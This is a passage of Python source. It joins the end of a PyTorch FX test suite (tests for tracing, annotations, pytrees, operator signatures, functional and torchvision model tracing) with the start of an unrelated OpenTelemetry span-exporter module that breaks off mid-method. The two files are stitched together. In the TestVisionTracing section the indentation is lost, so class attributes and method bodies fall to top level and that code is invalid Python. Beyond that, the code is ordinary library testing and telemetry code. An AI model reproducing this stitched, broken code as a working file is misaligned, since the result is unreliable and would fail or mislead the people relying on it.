        {"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
        mod_traced.graph,
    )

    # Check that both my_buff and my_param are found and the same.
    try:
        new_buff = mod_traced_new.get_buffer("my_buff")
    except Exception:
        self.fail("Did not find my_buff")
    self.assertEqual(orig_buff, new_buff)

    try:
        new_param = mod_traced_new.get_parameter("my_param")
    except Exception:
        self.fail("Did not find my_param")
    self.assertEqual(orig_param, new_param)

    # Both modules must compute identical outputs.
    x = torch.rand(3, 4)
    orig_out = mod_traced(x)
    submodules_out = mod_traced_new(x)
    self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
    """GraphModule built from a plain attribute dict copies buffers/params."""
    self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
    """GraphModule built from the root module copies buffers/params."""
    self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
    """Tracing handles plain (non-string) annotations on forward()."""
    class A:
        def __call__(self, x: torch.Tensor):
            return torch.add(x, x)

    class M(torch.nn.Module):
        def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
            return a(x)

    self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
    """Tracing handles string ("forward reference") annotations."""
    class A:
        def __call__(self, x: torch.Tensor):
            return torch.add(x, x)

    class M(torch.nn.Module):
        def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
            return a(x)

    self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
    """Tracing handles container annotations (List[torch.Tensor])."""
    class A:
        def __call__(self, x: torch.Tensor):
            return torch.add(x, x)

    class M(torch.nn.Module):
        def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
            return a(x[0])

    self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
    """Tracing handles container annotations with string element types."""
    class A:
        def __call__(self, x: torch.Tensor):
            return torch.add(x, x)

    class M(torch.nn.Module):
        def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
            # NOTE: indexes the *result* of a(x), unlike the sibling test.
            return a(x)[0]

    self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
                 "`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
    """Importing a module that uses `from __future__ import annotations` works."""
    try:
        import fx.test_future    # noqa: F401
    finally:
        # Drop the cached module so the import side effects don't leak
        # into other tests.
        del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
    """Empty-tuple annotations survive codegen and scripting.

    Generated FX code spells typing names with a `typing_` prefix; the
    scripted code uses the plain TorchScript spelling.
    """
    class Foo(torch.nn.Module):
        def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
            return "foo"

    traced = torch.fx.symbolic_trace(Foo())

    x = ()
    y = ("bar", ())

    traced(x, y)

    FileCheck().check("_Tuple[()]") \
               .check("typing_Tuple[str,typing_Tuple[()]]") \
               .run(traced.code)

    scripted = torch.jit.script(traced)

    scripted(x, y)

    FileCheck().check("Tuple[()]") \
               .check("Tuple[str, Tuple[()]]") \
               .run(scripted.code)
@skipIfNoTorchVision
def test_cpatcher(self):
    """torch._C._fx.patch_function intercepts C-level calls during profiling.

    A sys.setprofile hook patches every C function as it is called; the
    patched wrapper bumps a counter, and `c_patch_enabled` guards against
    re-patching the calls made inside the wrapper itself.
    """
    cnt = 0

    def patched_impl(to_patch, args, kwargs):
        nonlocal cnt
        cnt += 1
        return to_patch(*args, **kwargs)

    c_patch_enabled = True

    def patched_in(to_patch, args, kwargs):
        nonlocal c_patch_enabled
        try:
            # Disable patching while running the (instrumented) call so the
            # wrapper's own C calls are not recursively patched.
            c_patch_enabled = False
            r = patched_impl(to_patch, args, kwargs)
        finally:
            c_patch_enabled = True
        return r

    def trace_func(frame, action, arg):
        if action == 'c_call':
            if c_patch_enabled:
                torch._C._fx.patch_function(arg, patched_in)

    import torch
    rn = torchvision_models.resnet18()

    try:
        sys.setprofile(trace_func)
        rn(torch.rand(1, 3, 224, 224))
        # Also exercise patching of the builtin print.
        print("testing print patch")
    finally:
        # Always remove the profile hook, even if the model call fails.
        sys.setprofile(None)

    # At least one C call must have been intercepted.
    assert(cnt != 0)
def test_randn(self):
    """enable_cpatching controls whether torch.randn calls are captured."""
    def f():
        return torch.randn(3, 3)

    def has_randn_node(gm):
        return any(node.target == torch.randn for node in gm.graph.nodes)

    # cpatching on: the randn call shows up in the graph.
    assert has_randn_node(symbolic_trace(f, enable_cpatching=True))

    # cpatching off: randn is evaluated eagerly, no node recorded.
    assert not has_randn_node(symbolic_trace(f, enable_cpatching=False))

    # And back on again, to make sure the patching is reversible.
    assert has_randn_node(symbolic_trace(f, enable_cpatching=True))
def test_pytree(self):
    """Tracing with pytree-structured concrete_args round-trips correctly.

    Each (fn, input-structure) pair is traced with PH markers standing in
    for proxied leaves, re-traced, and pickled, checking the output and
    placeholder counts each time.
    """
    def f_sum(x):
        return sum(x)

    def f_sum_dict(x):
        out = 0
        for k, v in x.items():
            out += v
        return out

    def f_dict_list_map(x):
        new_dict = {}
        for k, v in x.items():
            new_dict[k] = [i + 1 for i in v]
        return new_dict

    def f_dict_add(x):
        return x['a'] + sum(x['z'])

    # Register the custom Foo container with both pytree flavors.
    pytree._register_pytree_node(
        Foo,
        lambda x: ([x.a, x.b], None),
        lambda x, _: Foo(x[0], x[1]),
    )

    fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])

    def f_custom(x):
        return x.a + x.b

    def f_custom_dict(x):
        return f_sum_dict(x.a) + x.b

    def f_return_custom(x):
        return Foo(x.b, x.a)

    tests = [
        (f_sum, [PH, PH, PH]),
        (f_sum, []),
        (f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
        (f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
        (f_dict_list_map, {5: (PH, PH, PH)}),
        (f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
        (f_dict_add, {'a': PH, 'z': []}),
        (f_custom, Foo(PH, PH)),
        (f_custom, Foo(PH, 3)),
        (f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
        # (f_return_custom, Foo(PH, PH)),  # Don't currently support output pytrees
    ]

    def verify_pytree(f, inp):
        # Replace each PH marker with a concrete random tensor.
        val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
        # NOTE(review): this is len() of a list of *booleans*, i.e. the
        # TOTAL number of flattened leaves, not just the PH ones —
        # presumably every leaf becomes a placeholder here; confirm.
        num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
        orig_out = f(val)
        nf = symbolic_trace(f, concrete_args={'x': inp})
        self.assertEqual(nf(val), orig_out)
        assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
        assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)

        # Re-tracing without concrete_args collapses back to one placeholder.
        nf = symbolic_trace(nf)
        self.assertEqual(nf(val), orig_out)
        assert "tree_flatten_spec" not in nf.code
        assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)

        # And re-tracing with concrete_args expands the placeholders again.
        nf = symbolic_trace(nf, concrete_args={'x': inp})
        self.assertEqual(nf(val), orig_out)
        assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
        assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)

        # The traced module must survive a pickle round-trip.
        pickled = pickle.dumps(nf)
        nf = pickle.loads(pickled)
        self.assertEqual(nf(val), orig_out)

    for f, inp in tests:
        verify_pytree(f, inp)
def test_pytree_concrete(self):
    """A concrete (non-PH) leaf inside a pytree specializes the branch."""
    def f(b, a):
        if b:
            return a['a']
        else:
            return a['z']

    # `b` is a concrete bool; only the dict leaves are proxied.
    inp = {'a': {'a': PH, 'z': PH}, 'b': True}
    nf = symbolic_trace(f, concrete_args=inp)
    val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
    self.assertEqual(nf(**val), f(**val))

    # Re-tracing the traced module must preserve behavior.
    nf = symbolic_trace(nf)
    self.assertEqual(nf(**val), f(**val))
def run_getitem_target():
    """Subprocess entry point: run the getitem tests with Tensor.__getitem__ patched.

    Temporarily registers Tensor.__getitem__ as a wrapped method so FX
    records it, then restores the patch list.
    """
    from torch.fx._symbolic_trace import _wrapped_methods_to_patch
    _wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
    try:
        TestFX().getitem_inner()
    finally:
        _wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
    """Checks that OpInfo sample inputs bind to retrievable torch-op schemas."""

    @onlyCPU
    @ops(op_db, allowed_dtypes=(torch.float,))
    def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
        """For each sample input, some schema overload must bind and execute.

        Ops with no usable schema must be listed in `known_no_schema` (or
        live under `nn.functional`), otherwise the failure is surfaced.
        """
        # Sorted and one entry on each line to minimize merge conflicts.
        known_no_schema = {'cdist',
                           'contiguous',
                           'dstack',
                           'einsum',
                           'expand',
                           'expand_as',
                           'fill_',
                           'hstack',
                           'linalg.multi_dot',
                           'norm',
                           'polygamma',
                           'repeat',
                           'reshape_as',
                           'resize_',
                           'resize_as_',
                           'stack',
                           'to_sparse',
                           'view',
                           'view_as',
                           'nn.functional.hardshrink',
                           'vstack',
                           'where',
                           'zero_',
                           '__getitem__',
                           '__radd__',
                           '__rsub__',
                           '__rmul__',
                           '__rdiv__',
                           '__rmod__',
                           '__rpow__',
                           '__rmatmul__'}

        try:
            sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
            schemas = get_signature_for_torch_op(op.op)
            if not schemas:
                raise RuntimeError('No Schemas Returned')
            for sample_input in sample_inputs_itr:
                # Iterate through overloads until we hit a match. If we exit this
                # loop via `else`, we haven't found a match
                for schema in schemas:
                    try:
                        bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
                        bound_args.apply_defaults()
                        op(*bound_args.args, **bound_args.kwargs)
                        break
                    except TypeError:
                        # Fixed: dropped the unused `as e` binding; this
                        # overload doesn't accept the sample — try the next.
                        pass
                else:
                    raise RuntimeError(f'Did not match any schemas for op {op.name}!')

        except Exception:
            # Fixed: dropped the unused `as e` binding. Only ops with known
            # schema gaps are allowed to fail.
            assert op.name in known_no_schema or "nn.functional" in op.name
class TestFunctionalTracing(JitTestCase):
    """Auto-generated tests for symbolic-traceability of torch.nn.functional ops.

    `generate_tests` attaches one test per public functional: tracing must
    either succeed or fail with the exact (exception type, message regex)
    registered for that functional below.
    """
    # Support/dispatch helpers that are not interesting to trace.
    IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
                    "has_torch_function_variadic", "handle_torch_function",
                    "boolean_dispatch")
    # Patched to always return False in setUpClass (originals restored in
    # tearDownClass) so tracing doesn't detour through torch_function.
    TO_PATCH = {"has_torch_function": None,
                "has_torch_function_unary": None,
                "has_torch_function_variadic": None}

    # Expected failure modes: (exception type, message regex) pairs.
    BUILT_IN_FUNC = (AssertionError, "")
    PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
    PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
    LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
    ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
    CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
    INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")

    # Functional name -> expected failure mode when traced.
    UNTRACEABLE_FUNCTIONALS = {
        "adaptive_avg_pool1d": BUILT_IN_FUNC,
        "avg_pool1d": BUILT_IN_FUNC,
        "avg_pool2d": BUILT_IN_FUNC,
        "avg_pool3d": BUILT_IN_FUNC,
        "celu_": BUILT_IN_FUNC,
        "channel_shuffle": BUILT_IN_FUNC,
        "conv1d": BUILT_IN_FUNC,
        "conv2d": BUILT_IN_FUNC,
        "conv3d": BUILT_IN_FUNC,
        "conv_tbc": BUILT_IN_FUNC,
        "conv_transpose1d": BUILT_IN_FUNC,
        "conv_transpose2d": BUILT_IN_FUNC,
        "conv_transpose3d": BUILT_IN_FUNC,
        "cosine_similarity": BUILT_IN_FUNC,
        "elu_": BUILT_IN_FUNC,
        "hardtanh_": BUILT_IN_FUNC,
        "leaky_relu_": BUILT_IN_FUNC,
        "logsigmoid": BUILT_IN_FUNC,
        "one_hot": BUILT_IN_FUNC,
        "pdist": BUILT_IN_FUNC,
        "pixel_shuffle": BUILT_IN_FUNC,
        "pixel_unshuffle": BUILT_IN_FUNC,
        "relu_": BUILT_IN_FUNC,
        "rrelu_": BUILT_IN_FUNC,
        "selu_": BUILT_IN_FUNC,
        "softplus": BUILT_IN_FUNC,
        "softshrink": BUILT_IN_FUNC,
        "threshold_": BUILT_IN_FUNC,

        "adaptive_avg_pool2d": LEN_ERROR,
        "adaptive_avg_pool3d": LEN_ERROR,
        "adaptive_max_pool2d_with_indices": LEN_ERROR,
        "adaptive_max_pool3d_with_indices": LEN_ERROR,
        "instance_norm": CONTROL_FLOW,
        "pad": LEN_ERROR,

        "adaptive_max_pool1d": PROXY_ITERABLE,
        "adaptive_max_pool2d": PROXY_ITERABLE,
        "adaptive_max_pool3d": PROXY_ITERABLE,
        "fractional_max_pool2d": PROXY_ITERABLE,
        "fractional_max_pool3d": PROXY_ITERABLE,
        "max_pool1d": PROXY_ITERABLE,
        "max_pool2d": PROXY_ITERABLE,
        "max_pool3d": PROXY_ITERABLE,

        "group_norm": PROXY_ITERATED,
        "lp_pool2d": PROXY_ITERATED,
        "max_unpool1d": PROXY_ITERATED,
        "max_unpool2d": PROXY_ITERATED,
        "max_unpool3d": PROXY_ITERATED,

        "adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
        "fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
        "fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
        "hardshrink": ARG_TYPE_MISMATCH,
        "layer_norm": ARG_TYPE_MISMATCH,
        "lp_pool1d": ARG_TYPE_MISMATCH,
        "max_pool1d_with_indices": ARG_TYPE_MISMATCH,
        "max_pool2d_with_indices": ARG_TYPE_MISMATCH,
        "max_pool3d_with_indices": ARG_TYPE_MISMATCH,
        "pairwise_distance": ARG_TYPE_MISMATCH,

        "affine_grid": CONTROL_FLOW,
        "alpha_dropout": CONTROL_FLOW,
        "batch_norm": CONTROL_FLOW,
        "binary_cross_entropy": CONTROL_FLOW,
        "binary_cross_entropy_with_logits": CONTROL_FLOW,
        "celu": CONTROL_FLOW,
        "cosine_embedding_loss": CONTROL_FLOW,
        "cross_entropy": CONTROL_FLOW,
        "ctc_loss": CONTROL_FLOW,
        "dropout": CONTROL_FLOW,
        "dropout2d": CONTROL_FLOW,
        "dropout3d": CONTROL_FLOW,
        "elu": CONTROL_FLOW,
        "embedding": CONTROL_FLOW,
        "embedding_bag": CONTROL_FLOW,
        "feature_alpha_dropout": CONTROL_FLOW,
        "fold": CONTROL_FLOW,
        "gaussian_nll_loss": CONTROL_FLOW,
        "glu": CONTROL_FLOW,
        "grid_sample": CONTROL_FLOW,
        "gumbel_softmax": CONTROL_FLOW,
        "hardsigmoid": CONTROL_FLOW,
        "hardswish": CONTROL_FLOW,
        "hardtanh": CONTROL_FLOW,
        "hinge_embedding_loss": CONTROL_FLOW,
        "huber_loss": CONTROL_FLOW,
        "interpolate": CONTROL_FLOW,
        "kl_div": CONTROL_FLOW,
        "l1_loss": CONTROL_FLOW,
        "leaky_relu": CONTROL_FLOW,
        "local_response_norm": CONTROL_FLOW,
        "margin_ranking_loss": CONTROL_FLOW,
        "mse_loss": CONTROL_FLOW,
        "multi_head_attention_forward": CONTROL_FLOW,
        "multi_margin_loss": CONTROL_FLOW,
        "multilabel_margin_loss": CONTROL_FLOW,
        "multilabel_soft_margin_loss": CONTROL_FLOW,
        "nll_loss": CONTROL_FLOW,
        "poisson_nll_loss": CONTROL_FLOW,
        "relu": CONTROL_FLOW,
        "relu6": CONTROL_FLOW,
        "rrelu": CONTROL_FLOW,
        "selu": CONTROL_FLOW,
        "silu": CONTROL_FLOW,
        "mish": CONTROL_FLOW,
        "smooth_l1_loss": CONTROL_FLOW,
        "soft_margin_loss": CONTROL_FLOW,
        "threshold": CONTROL_FLOW,
        "triplet_margin_loss": CONTROL_FLOW,
        "triplet_margin_with_distance_loss": CONTROL_FLOW,
        "unfold": CONTROL_FLOW,
        "upsample": CONTROL_FLOW,

        "upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
        "upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
    }

    # List of nn.functionals with Tensor inputs but not with type annotation
    FUNCTIONALS_WITHOUT_ANNOTATION = (
        "adaptive_max_pool1d",
        "adaptive_max_pool2d",
        "adaptive_max_pool3d",
        "fractional_max_pool2d",
        "fractional_max_pool3d",
        "max_pool1d",
        "max_pool2d",
        "max_pool3d",
        "gaussian_nll_loss",
        "upsample",
        "upsample_bilinear",
        "upsample_nearest",
    )

    # Inconsistent behavior between Python 3.8 and other Python versions:
    # - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
    # - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
    #   internal exception above
    # Use the following map to override the expected exception for Python 3.8
    UNTRACEABLE_FUNCTIONALS_PY38 = {
        "adaptive_max_pool1d": PROXY_ITERATED,
        "adaptive_max_pool2d": PROXY_ITERATED,
        "adaptive_max_pool3d": PROXY_ITERATED,
        "fractional_max_pool2d": PROXY_ITERATED,
        "fractional_max_pool3d": PROXY_ITERATED,
        "max_pool1d": PROXY_ITERATED,
        "max_pool2d": PROXY_ITERATED,
        "max_pool3d": PROXY_ITERATED,

        "group_norm": LEN_ERROR
    }

    @classmethod
    def _get_functional(cls):
        """Collect (name, fn) pairs of public torch.nn.functional callables."""
        functional_list = []
        for f in dir(torch.nn.functional):
            if not f.islower():
                continue
            # Ignore internal functions
            if f.startswith('_'):
                continue
            # Ignore supporting functions
            if f in cls.IGNORE_FUNCS:
                continue
            fn = getattr(torch.nn.functional, f)
            # Ignore non-callable object like modules
            if not isinstance(fn, Callable):
                continue
            if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
                try:
                    sig = inspect.signature(fn)
                    has_tensor_arg = False
                    for arg, param in sig.parameters.items():
                        if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
                            has_tensor_arg = True
                    if not has_tensor_arg:
                        continue
                # No signature or Object is not supported
                except ValueError:
                    pass
            functional_list.append((f, fn))
        return functional_list

    @classmethod
    def generate_test_func(cls, func_name, fn):
        """Build one test: tracing `fn` must match its registered outcome."""

        def functional_test(self):
            if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
                    sys.version_info >= (3, 8) and sys.version_info < (3, 10):
                exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
                with self.assertRaisesRegex(exc, err):
                    symbolic_trace(fn)
            elif func_name in self.UNTRACEABLE_FUNCTIONALS:
                exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
                with self.assertRaisesRegex(exc, err):
                    symbolic_trace(fn)
            else:
                symbolic_trace(fn)
        return functional_test

    @classmethod
    def generate_tests(cls):
        """Attach a test_nn_functional_<name> method for every functional."""
        functional_list = cls._get_functional()
        for func_name, fn in functional_list:
            test_name = "test_nn_functional_" + func_name
            functional_test = cls.generate_test_func(func_name, fn)
            setattr(cls, test_name, functional_test)

    @classmethod
    def setUpClass(cls):
        # Stub out the torch_function dispatch checks for the whole class.
        def no(*args, **kwargs):
            return False

        for name in cls.TO_PATCH.keys():
            cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
            setattr(torch.nn.functional, name, no)

    @classmethod
    def tearDownClass(cls):
        # Restore the functions saved in setUpClass.
        for name in cls.TO_PATCH.keys():
            setattr(torch.nn.functional, name, cls.TO_PATCH[name])
# Materialize the per-functional tests and the per-device operator tests at
# import time so the test runner can discover them.
TestFunctionalTracing.generate_tests()

instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
# Expected failure modes: (exception type, message regex) pairs.
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
    RuntimeError,
    r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)

# Detection models iterate over Proxy inputs and cannot be traced.
UNTRACEABLE_MODELS = {
    "fasterrcnn_resnet50_fpn": PROXY_ITERATED,
    "fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
    "fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
    "maskrcnn_resnet50_fpn": PROXY_ITERATED,
    "keypointrcnn_resnet50_fpn": PROXY_ITERATED,
    "retinanet_resnet50_fpn": PROXY_ITERATED,
}
# Models whose traced form cannot be scripted due to return-type mismatch.
UNSCRIPTABLE_MODELS = {
    "googlenet": INCONSISTENT_TYPE,
    "inception_v3": INCONSISTENT_TYPE,
}

# Per-model post-processing applied before comparing outputs: segmentation
# models return a dict keyed by "out"; detection models a (losses, preds)
# pair where index 1 holds the predictions.
output_transform = {
    "fcn_resnet50": lambda x: x["out"],
    "fcn_resnet101": lambda x: x["out"],
    "deeplabv3_resnet50": lambda x: x["out"],
    "deeplabv3_resnet101": lambda x: x["out"],
    "deeplabv3_mobilenet_v3_large": lambda x: x["out"],
    "lraspp_mobilenet_v3_large": lambda x: x["out"],
    "fasterrcnn_resnet50_fpn": lambda x: x[1],
    "fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
    "fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
    "maskrcnn_resnet50_fpn": lambda x: x[1],
    "keypointrcnn_resnet50_fpn": lambda x: x[1],
    "retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
    """Build a test that traces (and, when possible, scripts) one model.

    Untraceable models must raise their registered error; otherwise the
    traced graph — and, when scriptable, the scripted module — must match
    the eager model's (optionally transformed) output on input `x`.
    """
    def run_test(self):
        model = model_fn(**kwargs)
        model = model.eval()
        if name in self.UNTRACEABLE_MODELS:
            # Fixed swapped names: the registered pair is
            # (exception type, message pattern), not (err, exc).
            exc_type, pattern = self.UNTRACEABLE_MODELS[name]
            with self.assertRaisesRegex(exc_type, pattern):
                graph = symbolic_trace(model)
        else:
            out_transform = self.output_transform.get(name, lambda x: x)
            graph : torch.fx.GraphModule = symbolic_trace(model)
            a = out_transform(model(x))
            b = out_transform(graph(x))
            self.assertEqual(a, b)

            if name in self.UNSCRIPTABLE_MODELS:
                exc_type, pattern = self.UNSCRIPTABLE_MODELS[name]
                with self.assertRaisesRegex(exc_type, pattern):
                    script = torch.jit.script(graph)
            else:
                script = torch.jit.script(graph)
                c = out_transform(script(x))
                self.assertEqual(a, c)

    return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
# Only materialize the torchvision tests when torchvision is installed.
if HAS_TORCHVISION:
    TestVisionTracing.generate_tests()

if __name__ == '__main__':
    run_tests()
|
__init__.py
|
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import threading
import typing
from enum import Enum
from opentelemetry.context import Context
from opentelemetry.util import time_ns
from .. import Span, SpanProcessor
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
    """Possible outcomes of a :meth:`SpanExporter.export` call."""

    # Export succeeded.
    SUCCESS = 0
    # Export failed, but retrying the same batch may succeed.
    FAILED_RETRYABLE = 1
    # Export failed permanently; the batch should not be retried.
    FAILED_NOT_RETRYABLE = 2
class SpanExporter:
    """Interface for exporting spans.

    Interface to be implemented by services that want to export recorded
    spans in their own format.

    To export data this MUST be registered to the
    :class:`opentelemetry.sdk.trace.Tracer` using a
    `SimpleExportSpanProcessor` or a `BatchExportSpanProcessor`.
    """

    def export(self, spans: typing.Sequence[Span]) -> "SpanExportResult":
        """Exports a batch of telemetry data.

        Args:
            spans: The list of `opentelemetry.trace.Span` objects to be exported

        Returns:
            The result of the export
        """

    def shutdown(self) -> None:
        """Shuts down the exporter.

        Called when the SDK is shut down.
        """
class SimpleExportSpanProcessor(SpanProcessor):
    """Simple SpanProcessor implementation.

    Hands each span to the configured `SpanExporter` synchronously, as soon
    as the span ends.
    """

    def __init__(self, span_exporter: SpanExporter):
        self.span_exporter = span_exporter

    def on_start(self, span: Span) -> None:
        pass

    def on_end(self, span: Span) -> None:
        # Suppress instrumentation so the exporter's own work does not
        # produce further spans.
        with Context.use(suppress_instrumentation=True):
            self._export_single(span)

    def _export_single(self, span: Span) -> None:
        # Export one span, logging (not propagating) any exporter failure.
        # pylint: disable=broad-except
        try:
            self.span_exporter.export((span,))
        except Exception:
            logger.exception("Exception while exporting Span.")

    def shutdown(self) -> None:
        self.span_exporter.shutdown()
class BatchExportSpanProcessor(SpanProcessor):
    """Batch span processor implementation.

    BatchExportSpanProcessor is an implementation of `SpanProcessor` that
    batches ended spans and pushes them to the configured `SpanExporter`
    from a background worker thread.
    """

    def __init__(
        self,
        span_exporter: SpanExporter,
        max_queue_size: int = 2048,
        schedule_delay_millis: float = 5000,
        max_export_batch_size: int = 512,
    ):
        """
        Args:
            span_exporter: the exporter that receives the batched spans
            max_queue_size: maximum number of spans buffered; further spans
                are dropped once the buffer is full
            schedule_delay_millis: delay (ms) between two consecutive exports
            max_export_batch_size: maximum number of spans per export call

        Raises:
            ValueError: if any size/delay argument is non-positive, or if
                max_export_batch_size exceeds max_queue_size
        """
        if max_queue_size <= 0:
            raise ValueError("max_queue_size must be a positive integer.")
        if schedule_delay_millis <= 0:
            raise ValueError("schedule_delay_millis must be positive.")
        if max_export_batch_size <= 0:
            raise ValueError(
                "max_export_batch_size must be a positive integer."
            )
        if max_export_batch_size > max_queue_size:
            # Fixed message: it previously read "less than and equal to
            # max_export_batch_size", naming the wrong variable.
            raise ValueError(
                "max_export_batch_size must be less than or equal to max_queue_size."
            )
        self.span_exporter = span_exporter
        # Bounded deque: appendleft on a full deque silently evicts from the
        # right, which is why on_end checks fullness first to log the drop.
        self.queue = collections.deque(
            [], max_queue_size
        )  # type: typing.Deque[Span]
        self.worker_thread = threading.Thread(target=self.worker, daemon=True)
        self.condition = threading.Condition(threading.Lock())
        self.schedule_delay_millis = schedule_delay_millis
        self.max_export_batch_size = max_export_batch_size
        self.max_queue_size = max_queue_size
        self.done = False
        # flag that indicates that spans are being dropped
        self._spans_dropped = False
        # preallocated list to send spans to exporter
        self.spans_list = [
            None
        ] * self.max_export_batch_size  # type: typing.List[typing.Optional[Span]]
        self.worker_thread.start()

    def on_start(self, span: Span) -> None:
        pass

    def on_end(self, span: Span) -> None:
        if self.done:
            # use the module logger, consistent with the rest of this module
            # (was the root logger via logging.warning)
            logger.warning("Already shutdown, dropping span.")
            return
        if len(self.queue) == self.max_queue_size:
            if not self._spans_dropped:
                logger.warning("Queue is full, likely spans will be dropped.")
                self._spans_dropped = True
        self.queue.appendleft(span)
        # Wake the worker early once the queue is at least half full.
        if len(self.queue) >= self.max_queue_size // 2:
            with self.condition:
                self.condition.notify()

    def worker(self):
        """Background loop: wait for work (or timeout), then export a batch."""
        timeout = self.schedule_delay_millis / 1e3
        while not self.done:
            if len(self.queue) < self.max_export_batch_size:
                with self.condition:
                    self.condition.wait(timeout)
                    if not self.queue:
                        # spurious notification, let's wait again
                        continue
                    if self.done:
                        # missing spans will be sent when calling flush
                        break
            # substract the duration of this export call to the next timeout
            start = time_ns()
            self.export()
            end = time_ns()
